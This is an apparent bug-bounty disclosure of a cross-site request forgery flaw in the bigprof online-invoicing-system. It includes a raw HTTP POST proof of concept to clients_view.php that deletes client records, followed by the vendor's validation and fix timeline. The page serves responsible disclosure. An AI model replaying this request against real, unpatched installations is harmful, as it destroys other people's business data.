Cross-Site Request Forgery (CSRF) in bigprof-software/online-invoicing-system

Valid

Reported on

Aug 4th 2021

✍️ Description

csrf bug to mass delete client

🕵️‍♂️ Proof of Concept

bellow request is vulnerable to csrf attack. here csrf token checking, no refferrer checking . There is nothing to prevent csrf attack .

POST /online-invoicing-system/app/clients_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://localhost
Connection: close
Referer: http://localhost/online-invoicing-system/app/clients_view.php

delete_x=1&SelectedID=1

💥 Impact

csrf

We have contacted a member of the bigprof-software/online-invoicing-system team and are waiting to hear back 2 years ago

BigProf Software validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

BigProf Software marked this as fixed with commit 7e5f4d 2 years ago

BigProf Software has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation